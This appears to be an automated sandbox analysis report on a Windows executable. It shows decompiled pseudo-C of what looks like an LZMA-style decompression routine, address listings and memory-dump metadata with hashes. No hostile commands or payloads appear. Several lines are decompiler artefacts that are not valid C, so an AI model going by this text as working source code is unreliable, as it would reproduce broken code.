                                            							__eax =  *(__ebp - 0x4c) << 4;
                                            							 *(__ebp - 0x30) = 8;
                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            							L130:
                                            							 *(__ebp - 0x58) = __eax;
                                            							 *(__ebp - 0x40) = 3;
                                            							goto L144;
                                            						case 0x14:
                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            							__eax =  *(__ebp - 0x80);
                                            							goto L140;
                                            						case 0x15:
                                            							__eax = 0;
                                            							__eflags =  *(__ebp - 0x38) - 7;
                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            							__al = __al & 0x000000fd;
                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                            							goto L120;
                                            						case 0x16:
                                            							__eax =  *(__ebp - 0x30);
                                            							__eflags = __eax - 4;
                                            							if(__eax >= 4) {
                                            								_push(3);
                                            								_pop(__eax);
                                            							}
                                            							__ecx =  *(__ebp - 4);
                                            							 *(__ebp - 0x40) = 6;
                                            							__eax = __eax << 7;
                                            							 *(__ebp - 0x7c) = 0x19;
                                            							 *(__ebp - 0x58) = __eax;
                                            							goto L145;
                                            						case 0x17:
                                            							L145:
                                            							__eax =  *(__ebp - 0x40);
                                            							 *(__ebp - 0x50) = 1;
                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                            							goto L149;
                                            						case 0x18:
                                            							L146:
                                            							__eflags =  *(__ebp - 0x6c);
                                            							if( *(__ebp - 0x6c) == 0) {
                                            								 *(__ebp - 0x88) = 0x18;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x70);
                                            							__eax =  *(__ebp - 0xc);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							_t484 = __ebp - 0x70;
                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                            							__eflags =  *_t484;
                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            							L148:
                                            							_t487 = __ebp - 0x48;
                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                            							__eflags =  *_t487;
                                            							L149:
                                            							__eflags =  *(__ebp - 0x48);
                                            							if( *(__ebp - 0x48) <= 0) {
                                            								__ecx =  *(__ebp - 0x40);
                                            								__ebx =  *(__ebp - 0x50);
                                            								0 = 1;
                                            								__eax = 1 << __cl;
                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                            								__eax =  *(__ebp - 0x7c);
                                            								 *(__ebp - 0x44) = __ebx;
                                            								goto L140;
                                            							}
                                            							__eax =  *(__ebp - 0x50);
                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            							__eax =  *(__ebp - 0x58);
                                            							__esi = __edx + __eax;
                                            							 *(__ebp - 0x54) = __esi;
                                            							__ax =  *__esi;
                                            							__edi = __ax & 0x0000ffff;
                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                            							if( *(__ebp - 0xc) >= __ecx) {
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            								__cx = __ax;
                                            								__cx = __ax >> 5;
                                            								__eax = __eax - __ecx;
                                            								__edx = __edx + 1;
                                            								__eflags = __edx;
                                            								 *__esi = __ax;
                                            								 *(__ebp - 0x50) = __edx;
                                            							} else {
                                            								 *(__ebp - 0x10) = __ecx;
                                            								0x800 = 0x800 - __edi;
                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            								 *__esi = __cx;
                                            							}
                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                            								goto L148;
                                            							} else {
                                            								goto L146;
                                            							}
                                            						case 0x19:
                                            							__eflags = __ebx - 4;
                                            							if(__ebx < 4) {
                                            								 *(__ebp - 0x2c) = __ebx;
                                            								L119:
                                            								_t393 = __ebp - 0x2c;
                                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                                            								__eflags =  *_t393;
                                            								L120:
                                            								__eax =  *(__ebp - 0x2c);
                                            								__eflags = __eax;
                                            								if(__eax == 0) {
                                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                            									goto L170;
                                            								}
                                            								__eflags = __eax -  *(__ebp - 0x60);
                                            								if(__eax >  *(__ebp - 0x60)) {
                                            									goto L171;
                                            								}
                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                            								__eax =  *(__ebp - 0x30);
                                            								_t400 = __ebp - 0x60;
                                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                            								__eflags =  *_t400;
                                            								goto L123;
                                            							}
                                            							__ecx = __ebx;
                                            							__eax = __ebx;
                                            							__ecx = __ebx >> 1;
                                            							__eax = __ebx & 0x00000001;
                                            							__ecx = (__ebx >> 1) - 1;
                                            							__al = __al | 0x00000002;
                                            							__eax = (__ebx & 0x00000001) << __cl;
                                            							__eflags = __ebx - 0xe;
                                            							 *(__ebp - 0x2c) = __eax;
                                            							if(__ebx >= 0xe) {
                                            								__ebx = 0;
                                            								 *(__ebp - 0x48) = __ecx;
                                            								L102:
                                            								__eflags =  *(__ebp - 0x48);
                                            								if( *(__ebp - 0x48) <= 0) {
                                            									__eax = __eax + __ebx;
                                            									 *(__ebp - 0x40) = 4;
                                            									 *(__ebp - 0x2c) = __eax;
                                            									__eax =  *(__ebp - 4);
                                            									__eax =  *(__ebp - 4) + 0x644;
                                            									__eflags = __eax;
                                            									L108:
                                            									__ebx = 0;
                                            									 *(__ebp - 0x58) = __eax;
                                            									 *(__ebp - 0x50) = 1;
                                            									 *(__ebp - 0x44) = 0;
                                            									 *(__ebp - 0x48) = 0;
                                            									L112:
                                            									__eax =  *(__ebp - 0x40);
                                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                            										_t391 = __ebp - 0x2c;
                                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                            										__eflags =  *_t391;
                                            										goto L119;
                                            									}
                                            									__eax =  *(__ebp - 0x50);
                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            									__eax =  *(__ebp - 0x58);
                                            									__esi = __edi + __eax;
                                            									 *(__ebp - 0x54) = __esi;
                                            									__ax =  *__esi;
                                            									__ecx = __ax & 0x0000ffff;
                                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                            									__eflags =  *(__ebp - 0xc) - __edx;
                                            									if( *(__ebp - 0xc) >= __edx) {
                                            										__ecx = 0;
                                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                            										__ecx = 1;
                                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                            										__ebx = 1;
                                            										__ecx =  *(__ebp - 0x48);
                                            										__ebx = 1 << __cl;
                                            										__ecx = 1 << __cl;
                                            										__ebx =  *(__ebp - 0x44);
                                            										__ebx =  *(__ebp - 0x44) | __ecx;
                                            										__cx = __ax;
                                            										__cx = __ax >> 5;
                                            										__eax = __eax - __ecx;
                                            										__edi = __edi + 1;
                                            										__eflags = __edi;
                                            										 *(__ebp - 0x44) = __ebx;
                                            										 *__esi = __ax;
                                            										 *(__ebp - 0x50) = __edi;
                                            									} else {
                                            										 *(__ebp - 0x10) = __edx;
                                            										0x800 = 0x800 - __ecx;
                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            										 *__esi = __dx;
                                            									}
                                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            									if( *(__ebp - 0x10) >= 0x1000000) {
                                            										L111:
                                            										_t368 = __ebp - 0x48;
                                            										 *_t368 =  *(__ebp - 0x48) + 1;
                                            										__eflags =  *_t368;
                                            										goto L112;
                                            									} else {
                                            										goto L109;
                                            									}
                                            								}
                                            								__ecx =  *(__ebp - 0xc);
                                            								__ebx = __ebx + __ebx;
                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            								 *(__ebp - 0x44) = __ebx;
                                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                            									__ecx =  *(__ebp - 0x10);
                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            									__ebx = __ebx | 0x00000001;
                                            									__eflags = __ebx;
                                            									 *(__ebp - 0x44) = __ebx;
                                            								}
                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                            									L101:
                                            									_t338 = __ebp - 0x48;
                                            									 *_t338 =  *(__ebp - 0x48) - 1;
                                            									__eflags =  *_t338;
                                            									goto L102;
                                            								} else {
                                            									goto L99;
                                            								}
                                            							}
                                            							__edx =  *(__ebp - 4);
                                            							__eax = __eax - __ebx;
                                            							 *(__ebp - 0x40) = __ecx;
                                            							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                            							goto L108;
                                            						case 0x1a:
                                            							L56:
                                            							__eflags =  *(__ebp - 0x64);
                                            							if( *(__ebp - 0x64) == 0) {
                                            								 *(__ebp - 0x88) = 0x1a;
                                            								goto L170;
                                            							}
                                            							__ecx =  *(__ebp - 0x68);
                                            							__al =  *(__ebp - 0x5c);
                                            							__edx =  *(__ebp - 8);
                                            							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            							 *( *(__ebp - 0x68)) = __al;
                                            							__ecx =  *(__ebp - 0x14);
                                            							 *(__ecx +  *(__ebp - 8)) = __al;
                                            							__eax = __ecx + 1;
                                            							__edx = 0;
                                            							_t192 = __eax %  *(__ebp - 0x74);
                                            							__eax = __eax /  *(__ebp - 0x74);
                                            							__edx = _t192;
                                            							goto L79;
                                            						case 0x1b:
                                            							goto L75;
                                            						case 0x1c:
                                            							while(1) {
                                            								L123:
                                            								__eflags =  *(__ebp - 0x64);
                                            								if( *(__ebp - 0x64) == 0) {
                                            									break;
                                            								}
                                            								__eax =  *(__ebp - 0x14);
                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            								__eflags = __eax -  *(__ebp - 0x74);
                                            								if(__eax >=  *(__ebp - 0x74)) {
                                            									__eax = __eax +  *(__ebp - 0x74);
                                            									__eflags = __eax;
                                            								}
                                            								__edx =  *(__ebp - 8);
                                            								__cl =  *(__eax + __edx);
                                            								__eax =  *(__ebp - 0x14);
                                            								 *(__ebp - 0x5c) = __cl;
                                            								 *(__eax + __edx) = __cl;
                                            								__eax = __eax + 1;
                                            								__edx = 0;
                                            								_t414 = __eax %  *(__ebp - 0x74);
                                            								__eax = __eax /  *(__ebp - 0x74);
                                            								__edx = _t414;
                                            								__eax =  *(__ebp - 0x68);
                                            								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                            								__eflags =  *(__ebp - 0x30);
                                            								 *( *(__ebp - 0x68)) = __cl;
                                            								 *(__ebp - 0x14) = _t414;
                                            								if( *(__ebp - 0x30) > 0) {
                                            									continue;
                                            								} else {
                                            									goto L80;
                                            								}
                                            							}
                                            							 *(__ebp - 0x88) = 0x1c;
                                            							goto L170;
                                            					}
                                            				}
                                            			}













                                            0x00406284
                                            0x0040628a
                                            0x0040628c
                                            0x0040628c
                                            0x0040628c
                                            0x0040628f
                                            0x00406292
                                            0x00406292
                                            0x00406295
                                            0x00406298
                                            0x00000000
                                            0x00000000
                                            0x0040629e
                                            0x004062a4
                                            0x00000000
                                            0x00000000
                                            0x004062aa
                                            0x004062aa
                                            0x004062ae
                                            0x004062b1
                                            0x004062b4
                                            0x004062b7
                                            0x004062ba
                                            0x004062bb
                                            0x004062be
                                            0x004062c0
                                            0x004062c6
                                            0x004062c9
                                            0x004062cc
                                            0x004062cf
                                            0x004062d2
                                            0x004062d5
                                            0x004062d8
                                            0x004062f4
                                            0x004062f7
                                            0x004062fa
                                            0x004062fd
                                            0x00406304
                                            0x00406308
                                            0x0040630a
                                            0x0040630e
                                            0x004062da
                                            0x004062da
                                            0x004062de
                                            0x004062e6
                                            0x004062eb
                                            0x004062ed
                                            0x004062ef
                                            0x004062ef
                                            0x00406311
                                            0x00406318
                                            0x0040631b
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406321
                                            0x00000000
                                            0x00406326
                                            0x00406326
                                            0x0040632a
                                            0x004069ea
                                            0x00000000
                                            0x004069ea
                                            0x00406330
                                            0x00406333
                                            0x00406336
                                            0x0040633a
                                            0x0040633d
                                            0x00406343
                                            0x00406345
                                            0x00406345
                                            0x00406345
                                            0x00406348
                                            0x0040634b
                                            0x0040634b
                                            0x0040634b
                                            0x00406351
                                            0x00000000
                                            0x00000000
                                            0x00406353
                                            0x00406356
                                            0x00406359
                                            0x0040635c
                                            0x0040635f
                                            0x00406362
                                            0x00406365
                                            0x00406368
                                            0x0040636b
                                            0x0040636e
                                            0x00406371
                                            0x00406389
                                            0x0040638c
                                            0x0040638f
                                            0x00406392
                                            0x00406392
                                            0x00406395
                                            0x00406399
                                            0x0040639b
                                            0x00406373
                                            0x00406373
                                            0x0040637b
                                            0x00406380
                                            0x00406382
                                            0x00406384
                                            0x00406384
                                            0x0040639e
                                            0x004063a5
                                            0x004063a8
                                            0x00000000
                                            0x004063aa
                                            0x00000000
                                            0x004063aa
                                            0x004063a8
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x00000000
                                            0x00000000
                                            0x004063ea
                                            0x004063ea
                                            0x004063ee
                                            0x004069f6
                                            0x00000000
                                            0x004069f6
                                            0x004063f4
                                            0x004063f7
                                            0x004063fa
                                            0x004063fe
                                            0x00406401
                                            0x00406407
                                            0x00406409
                                            0x00406409
                                            0x00406409
                                            0x0040640c
                                            0x0040640f
                                            0x0040640f
                                            0x00406415
                                            0x004063b3
                                            0x004063b3
                                            0x004063b6
                                            0x00000000
                                            0x004063b6
                                            0x00406417
                                            0x00406417
                                            0x0040641a
                                            0x0040641d
                                            0x00406420
                                            0x00406423
                                            0x00406426
                                            0x00406429
                                            0x0040642c
                                            0x0040642f
                                            0x00406432
                                            0x00406435
                                            0x0040644d
                                            0x00406450
                                            0x00406453
                                            0x00406456
                                            0x00406456
                                            0x00406459
                                            0x0040645d
                                            0x0040645f
                                            0x00406437
                                            0x00406437
                                            0x0040643f
                                            0x00406444
                                            0x00406446
                                            0x00406448
                                            0x00406448
                                            0x00406462
                                            0x00406469
                                            0x0040646c
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x004066fb
                                            0x004066fb
                                            0x004066ff
                                            0x00406a26
                                            0x00000000
                                            0x00406a26
                                            0x00406705
                                            0x00406708
                                            0x0040670b
                                            0x0040670f
                                            0x00406712
                                            0x00406718
                                            0x0040671a
                                            0x0040671a
                                            0x0040671a
                                            0x0040671d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040680a
                                            0x0040680e
                                            0x00406830
                                            0x00406833
                                            0x0040683d
                                            0x00000000
                                            0x0040683d
                                            0x00406810
                                            0x00406813
                                            0x00406817
                                            0x0040681a
                                            0x0040681a
                                            0x0040681d
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068f0
                                            0x004068f7
                                            0x004068fe
                                            0x004068fe
                                            0x00000000
                                            0x004068fe
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00406821
                                            0x00406821
                                            0x00406824
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069bb
                                            0x00000000
                                            0x00000000
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00406609
                                            0x0040660c
                                            0x0040660f
                                            0x00406611
                                            0x00406613
                                            0x00406613
                                            0x00406614
                                            0x00406617
                                            0x0040661e
                                            0x00406621
                                            0x0040662f
                                            0x00000000
                                            0x00000000
                                            0x00406905
                                            0x00406905
                                            0x00406908
                                            0x0040690f
                                            0x00000000
                                            0x00000000
                                            0x00406914
                                            0x00406914
                                            0x00406918
                                            0x00406a50
                                            0x00000000
                                            0x00406a50
                                            0x0040691e
                                            0x00406921
                                            0x00406924
                                            0x00406928
                                            0x0040692b
                                            0x00406931
                                            0x00406933
                                            0x00406933
                                            0x00406933
                                            0x00406936
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x0040693c
                                            0x0040693c
                                            0x00406940
                                            0x004069a0
                                            0x004069a3
                                            0x004069a8
                                            0x004069a9
                                            0x004069ab
                                            0x004069ad
                                            0x004069b0
                                            0x00000000
                                            0x004069b0
                                            0x00406942
                                            0x00406948
                                            0x0040694b
                                            0x0040694e
                                            0x00406951
                                            0x00406954
                                            0x00406957
                                            0x0040695a
                                            0x0040695d
                                            0x00406960
                                            0x00406963
                                            0x0040697c
                                            0x0040697f
                                            0x00406982
                                            0x00406985
                                            0x00406989
                                            0x0040698b
                                            0x0040698b
                                            0x0040698c
                                            0x0040698f
                                            0x00406965
                                            0x00406965
                                            0x0040696d
                                            0x00406972
                                            0x00406974
                                            0x00406977
                                            0x00406977
                                            0x00406992
                                            0x00406999
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x00406637
                                            0x0040663a
                                            0x00406670
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a3
                                            0x004067a3
                                            0x004067a6
                                            0x004067a8
                                            0x00406a32
                                            0x00000000
                                            0x00406a32
                                            0x004067ae
                                            0x004067b1
                                            0x00000000
                                            0x00000000
                                            0x004067b7
                                            0x004067bb
                                            0x004067be
                                            0x004067be
                                            0x004067be
                                            0x00000000
                                            0x004067be
                                            0x0040663c
                                            0x0040663e
                                            0x00406640
                                            0x00406642
                                            0x00406645
                                            0x00406646
                                            0x00406648
                                            0x0040664a
                                            0x0040664d
                                            0x00406650
                                            0x00406666
                                            0x0040666b
                                            0x004066a3
                                            0x004066a3
                                            0x004066a7
                                            0x004066d3
                                            0x004066d5
                                            0x004066dc
                                            0x004066df
                                            0x004066e2
                                            0x004066e2
                                            0x004066e7
                                            0x004066e7
                                            0x004066e9
                                            0x004066ec
                                            0x004066f3
                                            0x004066f6
                                            0x00406723
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a
                                            0x0040673d
                                            0x00406740
                                            0x00406743
                                            0x00406746
                                            0x00406749
                                            0x0040674c
                                            0x00406765
                                            0x00406767
                                            0x0040676a
                                            0x0040676b
                                            0x0040676e
                                            0x00406770
                                            0x00406773
                                            0x00406775
                                            0x00406777
                                            0x0040677a
                                            0x0040677c
                                            0x0040677f
                                            0x00406783
                                            0x00406785
                                            0x00406785
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x0040674e
                                            0x0040674e
                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652
                                            0x00406655
                                            0x00406657
                                            0x0040665a
                                            0x00000000
                                            0x00000000
                                            0x004063b9
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004067c1
                                            0x004067c1
                                            0x004067c1
                                            0x004067c5
                                            0x00000000
                                            0x00000000
                                            0x004067cb
                                            0x004067ce
                                            0x004067d1
                                            0x004067d4
                                            0x004067d6
                                            0x004067d6
                                            0x004067d6
                                            0x004067d9
                                            0x004067dc
                                            0x004067df
                                            0x004067e2
                                            0x004067e5
                                            0x004067e8
                                            0x004067e9
                                            0x004067eb
                                            0x004067eb
                                            0x004067eb
                                            0x004067ee
                                            0x004067f1
                                            0x004067f4
                                            0x004067f7
                                            0x004067fa
                                            0x004067fe
                                            0x00406800
                                            0x00406803
                                            0x00000000
                                            0x00406805
                                            0x00000000
                                            0x00406805
                                            0x00406803
                                            0x00406a38
                                            0x00000000
                                            0x00000000
                                            0x00406067

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                            • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                            • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                            • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E00406025(void* __ecx) {
                                            				void* _v8;
                                            				void* _v12;
                                            				signed int _v16;
                                            				unsigned int _v20;
                                            				signed int _v24;
                                            				signed int _v28;
                                            				signed int _v32;
                                            				signed int _v36;
                                            				signed int _v40;
                                            				signed int _v44;
                                            				signed int _v48;
                                            				signed int _v52;
                                            				signed int _v56;
                                            				signed int _v60;
                                            				signed int _v64;
                                            				signed int _v68;
                                            				signed int _v72;
                                            				signed int _v76;
                                            				signed int _v80;
                                            				signed int _v84;
                                            				signed int _v88;
                                            				signed int _v92;
                                            				signed int _v95;
                                            				signed int _v96;
                                            				signed int _v100;
                                            				signed int _v104;
                                            				signed int _v108;
                                            				signed int _v112;
                                            				signed int _v116;
                                            				signed int _v120;
                                            				intOrPtr _v124;
                                            				signed int _v128;
                                            				signed int _v132;
                                            				signed int _v136;
                                            				void _v140;
                                            				void* _v148;
                                            				signed int _t537;
                                            				signed int _t538;
                                            				signed int _t572;
                                            
                                            				_t572 = 0x22;
                                            				_v148 = __ecx;
                                            				memcpy( &_v140, __ecx, _t572 << 2);
                                            				if(_v52 == 0xffffffff) {
                                            					return 1;
                                            				}
                                            				while(1) {
                                            					L3:
                                            					_t537 = _v140;
                                            					if(_t537 > 0x1c) {
                                            						break;
                                            					}
                                            					switch( *((intOrPtr*)(_t537 * 4 +  &M00406A77))) {
                                            						case 0:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								goto L173;
                                            							}
                                            							_v112 = _v112 - 1;
                                            							_v116 = _v116 + 1;
                                            							_t537 =  *_v116;
                                            							__eflags = _t537 - 0xe1;
                                            							if(_t537 > 0xe1) {
                                            								goto L174;
                                            							}
                                            							_t542 = _t537 & 0x000000ff;
                                            							_push(0x2d);
                                            							asm("cdq");
                                            							_pop(_t576);
                                            							_push(9);
                                            							_pop(_t577);
                                            							_t622 = _t542 / _t576;
                                            							_t544 = _t542 % _t576 & 0x000000ff;
                                            							asm("cdq");
                                            							_t617 = _t544 % _t577 & 0x000000ff;
                                            							_v64 = _t617;
                                            							_v32 = (1 << _t622) - 1;
                                            							_v28 = (1 << _t544 / _t577) - 1;
                                            							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                            							__eflags = 0x600 - _v124;
                                            							if(0x600 == _v124) {
                                            								L12:
                                            								__eflags = _t625;
                                            								if(_t625 == 0) {
                                            									L14:
                                            									_v76 = _v76 & 0x00000000;
                                            									_v68 = _v68 & 0x00000000;
                                            									goto L17;
                                            								} else {
                                            									goto L13;
                                            								}
                                            								do {
                                            									L13:
                                            									_t625 = _t625 - 1;
                                            									__eflags = _t625;
                                            									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                            								} while (_t625 != 0);
                                            								goto L14;
                                            							}
                                            							__eflags = _v8;
                                            							if(_v8 != 0) {
                                            								GlobalFree(_v8);
                                            							}
                                            							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                            							__eflags = _t537;
                                            							_v8 = _t537;
                                            							if(_t537 == 0) {
                                            								goto L174;
                                            							} else {
                                            								_v124 = 0x600;
                                            								goto L12;
                                            							}
                                            						case 1:
                                            							L15:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 1;
                                            								goto L173;
                                            							}
                                            							_v112 = _v112 - 1;
                                            							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                            							_v116 = _v116 + 1;
                                            							_t50 =  &_v76;
                                            							 *_t50 = _v76 + 1;
                                            							__eflags =  *_t50;
                                            							L17:
                                            							__eflags = _v76 - 4;
                                            							if(_v76 < 4) {
                                            								goto L15;
                                            							}
                                            							_t550 = _v68;
                                            							__eflags = _t550 - _v120;
                                            							if(_t550 == _v120) {
                                            								L22:
                                            								_v76 = 5;
                                            								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                            								goto L25;
                                            							}
                                            							__eflags = _v12;
                                            							_v120 = _t550;
                                            							if(_v12 != 0) {
                                            								GlobalFree(_v12); // executed
                                            							}
                                            							_t537 = GlobalAlloc(0x40, _v68); // executed
                                            							__eflags = _t537;
                                            							_v12 = _t537;
                                            							if(_t537 == 0) {
                                            								goto L174;
                                            							} else {
                                            								goto L22;
                                            							}
                                            						case 2:
                                            							L26:
                                            							_t557 = _v100 & _v32;
                                            							_v136 = 6;
                                            							_v80 = _t557;
                                            							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                            							goto L135;
                                            						case 3:
                                            							L23:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 3;
                                            								goto L173;
                                            							}
                                            							_v112 = _v112 - 1;
                                            							_t72 =  &_v116;
                                            							 *_t72 = _v116 + 1;
                                            							__eflags =  *_t72;
                                            							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                            							L25:
                                            							_v76 = _v76 - 1;
                                            							__eflags = _v76;
                                            							if(_v76 != 0) {
                                            								goto L23;
                                            							}
                                            							goto L26;
                                            						case 4:
                                            							L136:
                                            							_t559 =  *_t626;
                                            							_t610 = _t559 & 0x0000ffff;
                                            							_t591 = (_v20 >> 0xb) * _t610;
                                            							__eflags = _v16 - _t591;
                                            							if(_v16 >= _t591) {
                                            								_v20 = _v20 - _t591;
                                            								_v16 = _v16 - _t591;
                                            								_v68 = 1;
                                            								_t560 = _t559 - (_t559 >> 5);
                                            								__eflags = _t560;
                                            								 *_t626 = _t560;
                                            							} else {
                                            								_v20 = _t591;
                                            								_v68 = _v68 & 0x00000000;
                                            								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                            							}
                                            							__eflags = _v20 - 0x1000000;
                                            							if(_v20 >= 0x1000000) {
                                            								goto L142;
                                            							} else {
                                            								goto L140;
                                            							}
                                            						case 5:
                                            							L140:
                                            							__eflags = _v112;
                                            							if(_v112 == 0) {
                                            								_v140 = 5;
                                            								goto L173;
                                            							}
                                            							_v20 = _v20 << 8;
                                            							_v112 = _v112 - 1;
                                            							_t464 =  &_v116;
                                            							 *_t464 = _v116 + 1;
                                            							__eflags =  *_t464;
